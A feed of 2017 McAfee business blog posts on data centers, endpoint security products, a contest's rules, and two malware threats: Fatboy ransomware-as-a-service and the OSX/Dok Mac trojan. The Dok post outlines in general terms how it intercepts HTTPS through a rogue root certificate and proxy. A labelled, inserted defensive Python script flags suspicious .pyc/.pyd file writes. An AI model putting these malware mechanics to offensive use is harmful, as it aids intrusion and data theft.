To read the full case study on Norrköpings Kommun and its McAfee ENS implementation, click here. Get your questions answered by tweeting @McAfee_Business.

SDDC 101: The Why, the What, and the How
https://securingtomorrow.mcafee.com/business/cloud-security/sddc-101-the-why-the-what-and-the-how/
Mon, 22 May 2017 20:15:28 +0000

The post SDDC 101: The Why, the What, and the How appeared first on McAfee Blogs.

This blog post was written by Raja Patel.

The Software Defined Data Center (SDDC) has fundamentally changed how IT delivers infrastructure and services. SDDC rethinks traditional ways of using virtualized resources by adding virtual networks (SDN) and virtualized storage (SDS) to virtual compute as a better way to build data centers, improve security and keep costs down.

The included automation and orchestration of resources has made infrastructure operations smooth and, more importantly, has enabled security to be “built in” to the architecture. This is in stark contrast to traditional data centers with physical infrastructure, where security was an afterthought.

To evaluate the impact of the move to SDDC, McAfee, in partnership with VMware, sponsored the Osterman Research report “The Why, the What and the How of the Software-Defined Data Center,” which explains the nuts and bolts of SDDC, provides a deeper understanding of its value to your business as it moves to the cloud, and shows how it improves your security posture.

From the research, we see that while many organizations have virtualized their servers, they haven’t yet embraced the full virtualization of a software-defined data center:

[Figure 1: Percentage of Servers that are Virtualized, 2017 and 2019. Source: Osterman Research, Inc.]

And while only 3% have moved to SDDC, there is great intention to do so:

[Figure 2: “Does your organization plan to transform your data center(s) into Software-Defined Data Centers?” Source: Osterman Research, Inc.]

So, Why SDDC?

Our survey respondents confirmed what we believed: an SDDC improves operational efficiency, creates a more secure data center and reduces costs.

[Figure: Reasons That Organizations Want to Move to an SDDC. Source: Osterman Research, Inc.]

These business benefits help organizations as they transition their infrastructure into a cloud-ready agile environment for both private and hybrid cloud.

Probably the greatest benefit of an SDDC is its ability to transform the data center from being a slow-to-support-the-business department of saying “no” to an agile business driver, where the department says “yes” to quickly deploying applications and services, truly helping to grow the business objectives of your company. With the agile infrastructure of an SDDC, you can elastically scale as demand on your applications increases. An SDDC allows you to extend and manage applications across private and public clouds so you can optimize based on your current and evolving needs.

How does SDDC Work and Improve Security?

With SDDC, the three main pillars of the data center, compute, networking and storage, are virtualized. This virtualized environment provides a high degree of automation and agility. Traditionally, virtualized architectures were drawn by expedience, which meant that managing a virtualized data center required a lot of interaction with many moving parts, and those parts were neither integrated nor aware that they had been virtualized. SDDC rethinks and redraws functional boundaries by moving intelligence from the lower layers up into the VM platform, thus improving automation, management and security.

This new virtual and dynamic data center architecture introduces new security and compliance considerations as well. You will need complete visibility into all your workloads as they are provisioned so you can know what needs to be secured. In addition, as you now have east-west traffic flows between your VMs, inspection of that traffic is key. McAfee Data Center and Cloud Defense solutions help secure the new infrastructure of an SDDC, all within the same management as your traditional security. Integrated, dynamic protection technologies match the agility of your new data center infrastructure to protect against advanced threats and maintain compliance, including the ability to monitor east-west traffic flows inside the SDDC environment.

The bottom line? Transforming your traditional data center into an SDDC offers numerous benefits, including significant improvements to data center security. The SDDC is ready for prime time and offers substantial advantages over traditional data center approaches. Are you ready to grab hold of the opportunity?

To learn more, download the whitepaper “The Why, the What and the How of the Software-Defined Data Center.”

New Ransomware Adjusts Its Price Based Off Where You Live
https://securingtomorrow.mcafee.com/business/new-ransomware-adjusts-price-based-off-live/
Fri, 12 May 2017 20:21:22 +0000

The post New Ransomware Adjusts Its Price Based Off Where You Live appeared first on McAfee Blogs.

Discovered on Exploit, a Russian hacking forum, a new kind of RaaS (ransomware-as-a-service) portal named Fatboy Ransomware has emerged. The service, which is currently available for cybercriminals on the forum to leverage for their own benefit, is unique because it’s programmed to change its ransom amount based on the victim’s location, raising the amount in countries with a higher cost of living, based on the Big Mac Index.

The Big Mac Index, first introduced by The Economist in the 1980s, was meant as a lighthearted gauge of currency misalignment, but has grown to become a global standard for measuring international purchasing power parity. It is now being used by a threat actor using the handle “polnowz,” who has apparently already made $5,321 in ransomware payments off the tool. The cybercriminal also seems to be all about transparency, as anyone who signs up for Fatboy will work directly via Jabber with the author of the product instead of a third-party distributor.

And though it is the first known online extortion product that is designed to automatically change ransom amounts based on the victim’s location, this threat comes as no surprise. Cybercriminals are mostly financially motivated, so it is expected that we see business models that facilitate increased profit. This specific financially-motivated model, ransomware-as-a-service, has been around since at least mid-2015, and was popularized by Tox, a short-lived ransomware service.

So, how does this particular case of RaaS work? The encryption algorithms used are standard, leveraging AES-256 and RSA-2048, with the private key stored offsite until the ransom is paid. And when it comes to RaaS, the buyer is generally responsible for delivering the payload while the developer hosts the other services; as such, delivery methods vary widely. If the buyer of the portal wants to check in on the results of such delivery, they can log into an online panel for infection statistics. Other malware services have seen success by adding user-friendly features such as these panels.

Fatboy is not particularly sophisticated as a malware sample, but it is a good indicator that the ransomware business model for cybercriminals is still working. As long as there are sufficient profits, we will see more offerings, tools, and support for cybercriminals without the skills or time to develop their own ransomware.

Now, the next step is to think about protection. Users should keep their security products up-to-date and engage in good security behaviors. As for IT professionals, they should be watching for artifacts of this ransomware. While the infection is generally an executable, Python is used during encryption, so be on the lookout for suspicious activity with .pyc and .pyd files.
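As an added example (not code from the original post or from McAfee), the following heuristic triage script flags file-creation events in which compiled Python artifacts (.pyc/.pyd) appear in user-writable locations or are written by a process that is not a known Python interpreter. The event format, the sample events and the allow lists are constructed assumptions for illustration.

```python
"""Heuristic triage of file-creation events for unexpected .pyc/.pyd
artifacts, the kind of activity the post above suggests watching for.
Added example; the event format and allow lists below are assumptions."""
from pathlib import PureWindowsPath

# Directories into which a self-contained executable typically unpacks
# a bundled runtime; .pyc/.pyd writes here are worth a look (assumption).
USER_WRITABLE_HINTS = ("\\appdata\\local\\temp\\", "\\downloads\\",
                       "\\programdata\\", "\\users\\public\\")

# Processes expected to produce compiled Python artifacts (assumption;
# extend with your own build tooling before deploying).
EXPECTED_WRITERS = {"python.exe", "pythonw.exe", "pip.exe", "pip3.exe"}

SUSPECT_SUFFIXES = {".pyc", ".pyd"}


def parse_event(line):
    """Parse one constructed 'timestamp|host|process_image|target_file' record."""
    ts, host, proc, target = line.strip().split("|", 3)
    return {"ts": ts, "host": host, "process": proc, "target": target}


def assess(event):
    """Return the reasons this event looks suspicious (empty list if none)."""
    target = PureWindowsPath(event["target"])
    if target.suffix.lower() not in SUSPECT_SUFFIXES:
        return []
    reasons = []
    # Trailing separator so a hint also matches when it is the last component.
    parent = str(target.parent).lower() + "\\"
    if any(hint in parent for hint in USER_WRITABLE_HINTS):
        reasons.append("compiled Python artifact written to user-writable path")
    writer = PureWindowsPath(event["process"]).name.lower()
    if writer not in EXPECTED_WRITERS:
        reasons.append(f"written by unexpected process {writer}")
    return reasons


def triage(lines):
    """Group findings per host so an analyst sees one entry per machine."""
    findings = {}
    for line in lines:
        if not line.strip():
            continue
        event = parse_event(line)
        reasons = assess(event)
        if reasons:
            findings.setdefault(event["host"], []).append(
                {"ts": event["ts"], "process": event["process"],
                 "target": event["target"], "reasons": reasons})
    return findings


# Constructed sample events (not real telemetry): a benign interpreter
# writing bytecode to site-packages, an unknown executable unpacking
# .pyd files into the user's Temp directory, and an unrelated download.
SAMPLE_EVENTS = [
    "2017-05-12T10:01:02|WS-042|C:\\Python27\\python.exe|"
    "C:\\Python27\\Lib\\site-packages\\requests\\api.pyc",
    "2017-05-12T10:05:41|WS-042|C:\\Users\\jdoe\\AppData\\Local\\Temp\\invoice_2017.exe|"
    "C:\\Users\\jdoe\\AppData\\Local\\Temp\\ext_9f1\\_ctypes.pyd",
    "2017-05-12T10:05:42|WS-042|C:\\Users\\jdoe\\AppData\\Local\\Temp\\invoice_2017.exe|"
    "C:\\Users\\jdoe\\AppData\\Local\\Temp\\ext_9f1\\crypto.pyd",
    "2017-05-12T10:07:13|WS-017|C:\\Windows\\explorer.exe|"
    "C:\\Users\\asmith\\Downloads\\report.pdf",
]

if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS).items():
        print(f"{host}: {len(hits)} suspicious event(s)")
        for hit in hits:
            print(f"  {hit['ts']} {hit['target']} <- {hit['process']}")
            for reason in hit["reasons"]:
                print(f"    - {reason}")
```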

And if you do become infected by Fatboy ransomware, the No More Ransom project has pulled together a large set of decryption tools that victims can leverage, which you can find here. Also, learn more about preventing ransomware here.

If you’re looking to stay up-to-date on Fatboy ransomware and attacks like it, follow @McAfee and @McAfee_Business.

The EDR Balancing Act: Impact vs. Ability to Execute
https://securingtomorrow.mcafee.com/business/endpoint-security/edr-balancing-act/
Thu, 11 May 2017 15:00:40 +0000

The post The EDR Balancing Act: Impact vs. Ability to Execute appeared first on McAfee Blogs.

A new breed of advanced malware has its sights on your business. It’s been cleverly crafted to evade standard defenses, burrow into your endpoints, and hide undetected, indefinitely, waiting to spread to other systems. Unfortunately, this is now day-to-day reality for most organizations. The question is what to do about it.

Here’s the way organizations would like to respond: A top security investigator identifies a new malware threat. Using the latest and greatest endpoint detection and response (EDR) tools, she hunts for similar threats in the environment and roots out every other infected system. She learns exactly what the malware did and how, remediates the problem everywhere it exists, and updates defenses to block similar attacks in the future.

Unfortunately, here’s what actually happens: An endpoint administrator encounters an infected machine. He re-images the endpoint and puts the user back online. In the back of his mind, he knows he didn’t actually solve the problem that allowed the infection in the first place. He knows there’s a good chance it’s spread to other endpoints. But the few expert investigators in the organization are already buried in work. And sifting through mountains of data to manually search for the threat would take weeks.

You can see the disconnect. Modern EDR tools can provide amazing defense capabilities. But there just aren’t enough people out there who can use them effectively. According to a 2016 global survey from McAfee and the Center for Strategic and International Studies, 82 percent of organizations report a shortage of cybersecurity skills. Meanwhile, threats continue to increase.

There’s a way out of this catch-22, but it requires a different way of thinking about EDR. Incident detection and response doesn’t have to be limited to advanced toolsets for specialized experts. By taking advantage of EDR capabilities integrated into modern endpoint security platforms, you may be able to accomplish a lot more than you realize.

Generally, incident response falls across four categories: detect, contain, investigate, remediate. Modern endpoint platforms can integrate with EDR to provide more visibility and automated capabilities across all those categories, so that front-line administrators can shoulder a lot more of that burden than they used to.

Modern integrated endpoint solutions include:

  • File search: If an administrator can use Google, they should be able to use a basic EDR interface to search for a known malware file. With literally one click, they should be able to see a graphical map of every endpoint where the file resides.
  • Hash search: In the same way, any administrator who can copy and paste a file hash should be able to search malware they’ve encountered on an endpoint to see, in seconds, everywhere else it’s spread.
  • Automated remediation: When an admin does identify an infection, he’ll want to remove it from every infected endpoint with one click.
  • Automated inoculation: With another click, the administrator could update every other endpoint and security system in the environment to recognize that malware in the future and block it before it executes.

Compare that to the status quo, where each of these activities—correlating a suspected threat, discovering all endpoints it’s infected, removing it, tuning other security solutions (IPS, firewall, web gateways, endpoint agents) to detect it in the future—requires enormous manual effort.

Integrated EDR in Action

How much EDR should happen as part of everyday endpoint operations versus projects spearheaded by specialized experts? There’s no single right answer—it’s about balancing the potential impact of a given activity with your ability to execute. If you’re going to find the right EDR formula for your organization, you need to be honest with yourself about your personnel and investments.

State-of-the-art EDR platforms can provide amazing visibility and incident response capabilities—they can have a huge impact. But the cost to execute is extremely high. Alternatively, endpoint defense platforms with integrated EDR capabilities may not deliver exactly the same impact, but the cost to execute is much lower. With integrated EDR tools and automated workflows, many aspects of investigation and response can be handled by administrators with minimal training.

Integrated EDR may not replicate everything a skilled investigator can do with the most powerful EDR platforms. But if you can accomplish 80 percent of the results with a fraction of the effort, at a fraction of the cost, that’s a pretty good balance of impact and ability to execute.

“Stronger and Lighter” − An Early Adopter Compares Before vs After McAfee ENS
https://securingtomorrow.mcafee.com/business/stronger-lighter-%e2%88%92-early-adopter-compares-vs-mcafee-ens/
Thu, 11 May 2017 14:00:30 +0000

The post “Stronger and Lighter” − An Early Adopter Compares Before vs After McAfee ENS appeared first on McAfee Blogs.

When Philippe Maquoi heard about McAfee Endpoint Security (ENS), he immediately signed up to become one of its first beta testers. “I had been looking for a product like ENS for some time,” he says, “and I had confidence that McAfee was capable of giving me such a product.”

As head of the SPW Endpoint and Server Security team, Philippe Maquoi oversees information security for Service Public de Wallonie (SPW), the public administration arm of the regional government of Wallonia, the French-speaking region of Belgium. Maquoi and his team are responsible for securing the 9,000 desktops, 1,300 servers, and 1,000 major applications used by the government’s more than 8,000 employees.

Maquoi’s team initially migrated 1,000 computers to McAfee ENS version 10.2 and plans to migrate all 9,000 endpoints to ENS version 10.5 imminently. Although Maquoi can’t wait to take full advantage of the Real Protect machine learning and behavioral detection functionality in the most recent version of ENS, he has already seen tremendous benefits from implementing ENS 10.2.

“What I like best about McAfee ENS so far is that it is both stronger and lighter,” says Maquoi. “By that I mean it has superior detection and prevention technology that protects us better against present and future threats, but it is also easier to manage. Both aspects are equally important.”

Better Protection, Time Savings, and More with McAfee ENS

Since SPW initially installed ENS on some but not all nodes, it was easy to compare the impact of the new endpoint security framework to the previous endpoint protection. Take, for instance, when Nemucod ransomware attacked the organization and a handful of users, some on desktops with McAfee ENS and some on desktops without it, clicked on a button embedded in the phishing email. On the desktops not yet migrated to ENS, the user’s action triggered a JavaScript that downloaded the ransomware—which resulted in two days of work restoring corrupted administrative shares. On the desktops protected by ENS, however, the JavaScript was prevented from executing and users continued working, business as usual.

Maquoi’s team has also seen significant operational time savings compared to dealing with endpoints not yet protected by ENS. For starters, none of his team had to spend time remediating the ENS-protected desktops after the ransomware attack just mentioned. With McAfee ENS, there is less administrative overhead, which also frees up time.

“McAfee ENS is smart enough to stop threats without us having to manually create a bunch of rules, as we had to do in the past,” he states. “Also, instead of having to push out and update multiple agents for various aspects of protection—a HIPS agent, a web content control agent, and so on—booting and rebooting each time, with ENS we have a stronger toolset, encompassed in one product, with just one agent to deal with.”

In addition, for ENS-protected machines, Maquoi says his team no longer has to listen to complaints from angry users on scan day. With malware scanning no longer impacting the performance of those devices, their users are now much happier and more productive.

Furthermore, by migrating to McAfee ENS, SPW is laying the foundation for an adaptable, sustainable threat defense lifecycle. That’s because McAfee ENS is built to communicate using the McAfee Data Exchange Layer (DXL) fabric, which enables near real-time exchange of local and global threat information among diverse security systems via McAfee Threat Intelligence Exchange. Consequently, in the near future when SPW implements McAfee Advanced Threat Defense (ATD) for in-depth sandbox analysis, SPW endpoints will be able to receive threat information directly from ATD and send information directly to ATD, creating even stronger threat detection capabilities and enabling even faster response.

To read the full case study on Service Public de Wallonie, click here. Get your questions answered by tweeting @McAfee.

Become a Modern Endpoint Security Master
https://securingtomorrow.mcafee.com/business/endpoint-security/become-modern-endpoint-security-master/
Tue, 09 May 2017 23:00:08 +0000

The post Become a Modern Endpoint Security Master appeared first on McAfee Blogs.

A new wave of advanced, targeted malware is seeking out the gaps in conventional endpoint defenses and finding novel ways to exploit them. These attacks use packing, encryption, and polymorphism to mask their true intent, hammering away at your organization with previously unseen “zero-day” attacks that signature-based mechanisms are too slow to catch. They use sophisticated executables that can recognize when they’re being sandbox-analyzed and delay execution. They weaponize legitimate files and applications that appear clean on the surface but have malicious code buried deep within.

It all adds up to a nonstop, overwhelming effort as your endpoint administrators race against the clock to detect, contain, and remediate new malware threats. And if you’re like many organizations, this is a race you’re losing far too often. Too many threats get through. Too many resources are needed to sift through alerts from multiple siloed point solutions and clean up infections. And the time between detection and remediation keeps growing.

There’s an underlying problem here that may sound familiar. When you’re relying on multiple siloed endpoint defense products that can’t talk to each other, you require extra steps and manual effort from your administrators. That takes time and slows your response. Why not try a different approach? Instead of racing around swiveling between half a dozen siloed security tool interfaces, what if your team could use next-generation machine learning techniques to stop most threats before they ever gain a foothold on your endpoints? What if you had a unified, fully integrated, multi-layered defense fabric that could respond to new events and information immediately, without human intervention?

Peel Away the Malware Mask

Next-generation anti-malware capabilities from McAfee can help your organization combat the most evasive modern threats. Drawing on powerful machine learning analysis and application containment tools, your team can unmask hidden threats and stop them in their tracks—much faster with much less effort. These capabilities are delivered through three new innovations:

  • Real Protect Static: Malware authors may be able to change how their code looks, but it’s still malware. So it’s likely to share many attributes with known attacks, such as the compiler used, the shared libraries it references, and many other features. Real Protect Static pre-execution analysis goes beneath the surface, performing an exhaustive machine learning statistical comparison of static binary code features to compare suspicious executables against known threats. It unmasks most malware for what it is in milliseconds, without signatures.
  • Real Protect Dynamic: Even if a sophisticated attack masks its static attributes, it can’t hide how it behaves. Real Protect Dynamic behavioral analysis also provides machine learning statistical analysis, but now comparing the code’s actual behavior against profiles of hundreds of millions of malware samples. The executable is allowed to run while being closely monitored by the endpoint. If it starts behaving maliciously—such as overwriting files or making registry changes that match known malware behavior—the endpoint shuts it down, typically within seconds.
  • Dynamic Application Containment: This new endpoint defense, available only from McAfee, protects against zero-day malware by blocking process actions that malware often uses. Unlike techniques that would hold up the file (and the user) for minutes at a time, Dynamic Application Containment lets the suspicious file load into memory without allowing it to make certain changes to the endpoint or infect other systems while it is under suspicion. The endpoint and user can remain fully productive while providing an opportunity for security teams to perform in-depth analysis.

With these capabilities, your administrators can stop most threats before they can damage an endpoint. They can take on the most sophisticated, evasive malware without needing a team of highly trained security experts. They can fine-tune application containment tools to restrict what can happen on endpoints, and achieve the right balance of security and flexibility for the organization.

Drive Down Complexity, Accelerate Response

Real Protect and Dynamic Application Containment work with each other, with the other elements of McAfee Endpoint Security, and with other solutions such as McAfee Threat Intelligence Exchange and McAfee Advanced Threat Defense as a single, integrated system. For example, when Real Protect identifies an evasive threat as zero-day malware, it immediately communicates that information to McAfee Threat Intelligence Exchange, which then automatically inoculates the broader environment in near real time.

The result is a continually evolving threat model for your organization. Each new threat detected enhances the organization’s defenses as a whole. Previously manual steps in the detect, correct, and protect phases of the threat defense lifecycle disappear. And you gain the flexibility to mix and match the industry’s broadest portfolio of threat defense capabilities through a single interface.

Armed with these capabilities, your team can:

  • Unmask the attack: Stop more attacks by stripping away obfuscation techniques to see more malware threats.
  • Limit the impact: Contain, shield, and prevent damage to systems, either before an attack occurs or before it can cause irreversible damage or infection.
  • Track and adapt: Use automated, integrated defenses to perform a wider range of security operations without having to think about them or manually activate them.

Security Automation is Here — The Time is Now: 60% of respondents think manual processes are holding back security effectiveness
https://securingtomorrow.mcafee.com/business/security-operations/security-automation-time-now-60-respondents-think-manual-processes-holding-back-security-effectiveness/
Tue, 09 May 2017 19:39:40 +0000

This blog was written by Barbara Kay.

There was a time when automation was a dirty word in security. Now, it is a necessity. A new Enterprise Strategy Group (ESG) survey, sponsored by McAfee and other technology vendors, shows that 3 out of 5 organizations see manual processes as holding them back from better organizational effectiveness when it comes to security analytics and operations. My rule of thumb is: The third time you do the same thing, automate it. That doesn’t mean automating actions like wiping a system or rebooting, but it does mean you get the machines to do the easy work. Automation can mean setting a policy, defining an alarm or quarantine based on a trigger, defining a correlation rule to make the same review decision you had been doing and then setting an alarm or creating a watchlist, or using a script to package and forward data. Any of these approaches is easily implemented with today’s technology.

A case in point: the findings also show that the #1 priority for automation and/or orchestration is integrating external threat intelligence with internal security data collection and analysis. That capability is entirely automated today with the McAfee Enterprise Security Manager. You can consume IOCs and mine your database to see if they are already part of your environment, generating alarms for any matches, and also set a watch in case these IOCs enter your infrastructure in the future. The watchlist can also implement an action you define, from a simple alarm to active quarantine. Check out this video to see for yourself.

ESG Research, Cybersecurity Analytics and Operations Survey, April 2017.

Can You Spot the “Misaligned Lie?” Contest Terms and Conditions
https://securingtomorrow.mcafee.com/business/can-spot-misaligned-lie-contest-terms-conditions/
Mon, 08 May 2017 15:00:42 +0000

Remember the old-school icebreaker “Two Truths and a Lie?” Well, in honor of our Misaligned Incentives Report, we’re asking you to spot the “Misaligned Lie!” Put your knowledge to the test with this version of “Two Truths and a Lie” and you could win an Amazon Gift Card!

From May 8th-11th we’ll share “Two Truths and a Lie” posts on @McAfee. Your job is to reply to us with which answer you think is the lie. Once you tweet us your correct answer, you’ll be automatically entered to win a $100 Amazon Gift card! After the contest, we will select 4 winners who tweeted the correct answer, and notify them via direct message.

So head over to Twitter to catch the “Misaligned Lie” (and if you haven’t already, read our Misaligned Incentives Report and study up)!

For full contest details please see the Terms and Conditions below:

 Misaligned Incentives “Two Truths and a Lie” Contest

  1.   How to enter:

No purchase necessary. A purchase will not increase your chances of winning. McAfee Misaligned Incentives “Two Truths and a Lie” Contest Terms and Conditions will be conducted during one week, each day being the start of a new entry period. All entries for each day of the Misaligned Incentives “Two Truths and a Lie” Contest must be received during the time period allotted for that Misaligned Incentives “Two Truths and a Lie” Contest. Pacific Daylight Time shall control the Misaligned Incentives “Two Truths and a Lie” Contest. One winner will be chosen after the four days of the Misaligned Incentives “Two Truths and a Lie” Contest. The Misaligned Incentives “Two Truths and a Lie” Contest is as follows:

Misaligned Incentives “Two Truths and a Lie” Contest – One Week 4 Winners

  • Monday, May 8th 9am –  Friday, May 12th 6pm PST
    • 5 winners announced Monday, May 15th @ 3pm PST

On each of the days listed above, there will be 1 tweet from @McAfee with a sharecard for participants to reply to.

For each Misaligned Incentives “Two Truths and a Lie” Contest, participants must complete the following steps during the time allotted for the Misaligned Incentives “Two Truths and a Lie” Contest:

  1. Reply to the @McAfee or Social Reply Contest tweet with the correct “lie.”
  2. Your answer must be in the form of a reply to @McAfee in order to be successfully submitted.

Four winners will be chosen for the Misaligned Incentives “Two Truths and a Lie” Contest from the viable pool of entries that replied to the correct tweet. McAfee (“Sponsor”) and its McAfee social team will randomly choose winners from eligible and correct entries. The winners of each day will be announced by 3:00pm PDT on Monday, May 15th on the @McAfee Twitter handle. No other method of entry will be accepted besides Twitter. Only one entry per user is allowed, per contest. Participants are only eligible to win one day of the five days.

  1.   Eligibility:

The Misaligned Incentives “Two Truths and a Lie” Contest is open to all people who are 18 years of age or older on the date the Misaligned Incentives “Two Truths and a Lie” Contest begins and live in a jurisdiction where this prize and Misaligned Incentives “Two Truths and a Lie” Contest are not prohibited. Employees of Sponsor and its subsidiaries, affiliates, prize suppliers, and advertising and promotional agencies, their immediate families (spouses, parents, children, and siblings and their spouses), and individuals living in the same household as such employees are ineligible.

  1. Winner Selection: 

Five (5) total winners will be selected from the eligible entries received during each of the Misaligned Incentives “Two Truths and a Lie” Contest periods. By participating, entrants agree to be bound by the Official Misaligned Incentives “Two Truths and a Lie” Contest and the decisions of the coordinators, which shall be final and binding in all respects.

Winner Notification: 

Each winner will be notified via direct message (“DM”) on Twitter.com at or around 3:00pm PDT on each of the days listed above. Prize winners may be required to sign an Affidavit of Eligibility and Liability/Publicity Release (where permitted by law) to be returned within ten (10) days of written notification, or prize may be forfeited and an alternate winner selected. If a prize notification is returned as unclaimed or undeliverable to a potential winner, if potential winner cannot be reached within twenty four (24) hours from the first DM notification attempt, or if potential winner fails to return requisite document within the specified time period, or if a potential winner is not in compliance with these Official Rules, then such person shall be disqualified and, at Sponsor’s sole discretion, an alternate winner may be selected for the prize at issue based on the winner selection process described above.

  1.   Prizes: 

The prize for each Misaligned Incentives “Two Truths and a Lie” Contest is a $100 Amazon e-gift card (approximate retail value “ARV” of the prize is $100 USD).

Entrants agree that Sponsor has the sole right to determine the winners of the Misaligned Incentives “Two Truths and a Lie” Contest and all matters or disputes arising from the Misaligned Incentives “Two Truths and a Lie” Contest and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

Sponsor will not replace any lost or stolen prizes. Sponsor is not responsible for delays in prize delivery beyond its control. All other expenses and items not specifically mentioned in these Official Rules are not included and are the prize winners’ sole responsibility.

  1.   General conditions: 

Entrants agree that by entering they agree to be bound by these rules. All federal, state, and local taxes, fees, and surcharges on prize packages are the sole responsibility of the prizewinner.

Sponsor is not responsible for incorrect or inaccurate entry information, whether caused by any of the equipment or programming associated with or utilized in the McAfee Misaligned Incentives “Two Truths and a Lie” Contest, or by any technical or human error, which may occur in the processing of the Misaligned Incentives “Two Truths and a Lie” Contest entries. By entering, participants release and hold harmless Sponsor and its respective parents, subsidiaries, affiliates, directors, officers, employees, attorneys, agents, and representatives from any and all liability for any injuries, loss, claim, action, demand, or damage of any kind arising from or in connection with the Misaligned Incentives “Two Truths and a Lie” Contest, any prize won, any misuse or malfunction of any prize awarded, participation in any Misaligned Incentives “Two Truths and a Lie” Contest-related activity, or participation in the Misaligned Incentives “Two Truths and a Lie” Contest. Except for applicable manufacturer’s standard warranties, the prizes are awarded “AS IS” and WITHOUT WARRANTY OF ANY KIND, express or implied (including any implied warranty of merchantability or fitness for a particular purpose).

Limitations of Liability; Releases:

By entering the Contest, you release Sponsor and all Released Parties from any liability whatsoever, and waive any and all causes of action, related to any claims, costs, injuries, losses, or damages of any kind arising out of or in connection with the Contest or delivery, misdelivery, acceptance, possession, use of or inability to use any prize (including claims, costs, injuries, losses and damages related to rights of publicity or privacy, defamation or portrayal in a false light, whether intentional or unintentional), whether under a theory of contract, tort (including negligence), warranty or other theory.

TO THE FULLEST EXTENT PERMITTED BY APPLICABLE LAW, IN NO EVENT WILL THE SPONSOR OR THE RELEASED PARTIES BE LIABLE FOR ANY SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL DAMAGES, INCLUDING LOSS OF USE, LOSS OF PROFITS OR LOSS OF DATA, WHETHER IN AN ACTION IN CONTRACT, TORT (INCLUDING, NEGLIGENCE) OR OTHERWISE, ARISING OUT OF OR IN ANY WAY CONNECTED TO YOUR PARTICIPATION IN THE CONTEST OR USE OR INABILITY TO USE ANY EQUIPMENT PROVIDED FOR USE IN THE CONTEST OR ANY PRIZE, EVEN IF A RELEASED PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

  1. TO THE FULLEST EXTENT PERMITTED BY APPLICABLE LAW, IN NO EVENT WILL THE AGGREGATE LIABILITY OF THE RELEASED PARTIES (JOINTLY) ARISING OUT OF OR RELATING TO YOUR PARTICIPATION IN THE CONTEST OR USE OF OR INABILITY TO USE ANY EQUIPMENT PROVIDED FOR USE IN THE CONTEST OR ANY PRIZE EXCEED $10. THE LIMITATIONS SET FORTH IN THIS SECTION WILL NOT EXCLUDE OR LIMIT LIABILITY FOR PERSONAL INJURY OR PROPERTY DAMAGE CAUSED BY PRODUCTS RENTED FROM THE SPONSOR, OR FOR THE RELEASED PARTIES’ GROSS NEGLIGENCE, INTENTIONAL MISCONDUCT, OR FOR FRAUD.
  1. Use of Winner’s Name, Likeness, etc.: Except where prohibited by law, entry into the Contest constitutes permission to use your name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation (including in a public-facing winner list). As a condition of being awarded any prize, except where prohibited by law, winner may be required to execute a consent to the use of their name, hometown, aural and visual likeness and prize information for advertising, marketing, and promotional purposes without further permission or compensation. By entering this Contest, you consent to being contacted by Sponsor for any purpose in connection with this Contest.

Prize Forfeiture:

If winner cannot be notified, does not respond to notification, does not meet eligibility requirements, or otherwise does not comply with these prize Misaligned Incentives “Two Truths and a Lie” Contest rules, then the winner will forfeit the prize and an alternate winner will be selected from remaining eligible entry forms for each Misaligned Incentives “Two Truths and a Lie” Contest.

Dispute Resolution:

Entrants agree that Sponsor has the sole right to determine the winners of the Misaligned Incentives “Two Truths and a Lie” Contest and all matters or disputes arising from the Misaligned Incentives “Two Truths and a Lie” Contest and that its determination is final and binding. There are no prize substitutions, transfers or cash equivalents permitted except at the sole discretion of Sponsor.

Governing Law & Disputes:

EACH ENTRANT AGREES THAT ANY DISPUTES, CLAIMS, AND CAUSES OF ACTION ARISING OUT OF OR CONNECTED WITH THIS CONTEST OR ANY PRIZE AWARDED WILL BE RESOLVED INDIVIDUALLY, WITHOUT RESORT TO ANY FORM OF CLASS ACTION and these rules will be construed in accordance with the laws, jurisdiction, and venue of Delaware.

Privacy Policy:

Personal information obtained in connection with this Misaligned Incentives “Two Truths and a Lie” Contest will be handled in accordance with the policy set forth at http://www.mcafee.com/us/about/privacy.html

  1. Winner List; Rules Request: For a copy of the winner list, send a stamped, self-addressed, business-size envelope for arrival after May 12th 2017 and before May 11th 2018 to the address listed below, Attn: Misaligned Incentives “Two Truths and a Lie” Contest. To obtain a copy of these Official Rules, send a stamped, self-addressed business-size envelope to the address listed below, Attn: Margie Easter. VT residents may omit return postage.
  2. Intellectual Property Notice: McAfee and the McAfee logo are registered trademarks of McAfee, LLC. The Contest and all accompanying materials are copyright © 2017 by McAfee, LLC.  All rights reserved.
  3. Sponsor: McAfee, LLC, Corporate Headquarters, 2821 Mission College Blvd., Santa Clara, CA 95054 USA

New Mac Malware Manages to Spy on Encrypted Browser Traffic
https://securingtomorrow.mcafee.com/business/new-mac-malware-manages-spy-encrypted-browser-traffic/
Thu, 04 May 2017 19:00:56 +0000

This blog was written by Douglas McKee.

There’s a new cyberattack targeted at Mac OS users—a malware program called OSX/Dok. Discovered late last week primarily in Europe, the program is capable of spying on encrypted browser traffic to steal sensitive information. You heard correctly: it can eavesdrop on all of your web browsing.

How does this attack work?

First, the Trojan is digitally signed with a previously valid Apple certificate. It initially relies on social engineering, phishing for credentials either through email or by displaying a full-screen alert that claims there’s an urgent OS X update waiting to be installed. Once it gets access, the Trojan makes the changes it needs to infiltrate the user’s browsing activity.

It elevates the privileges of the current user to a permanent administrator and bypasses additional password prompts, keeping the rest of the infection process quiet. Dok also replaces existing login entries with its own so it runs when the user logs onto the computer. Then, it redirects all traffic to the Dark Web through a malicious proxy server and installs its own root certificate on the machine. From there, the attacker can carry out a man-in-the-middle attack and decrypt the user’s HTTPS traffic by pretending to be whichever website the victim attempts to access.

Since browsers typically alert users of compromised website connections, how are they not catching this attack? Because of the bad root certificate: once the malware’s own root certificate is installed and trusted by the machine, the certificates the malicious proxy presents for each site appear valid, so the browser shows no warning.

How do you protect yourself?

Apple mitigated the risk by revoking the certificate used in the attack. But there’s still more you can do to protect yourself from this attack and others like it.

NEVER open attachments or click on links from unknown senders. Also, check the source of the email and ensure legitimacy. Always be cautious whenever you’re asked to provide credentials.

Whenever possible, Apple users should only install apps from the Apple App Store to ensure they’re only using applications that Apple has screened and approved.

To learn more about this cyberattack and others like it, make sure to follow @McAfee and @McAfee_Business.

Heads Up: Massive Google Doc Phishing Scam Has Hit the Scene and is Spreading Fast
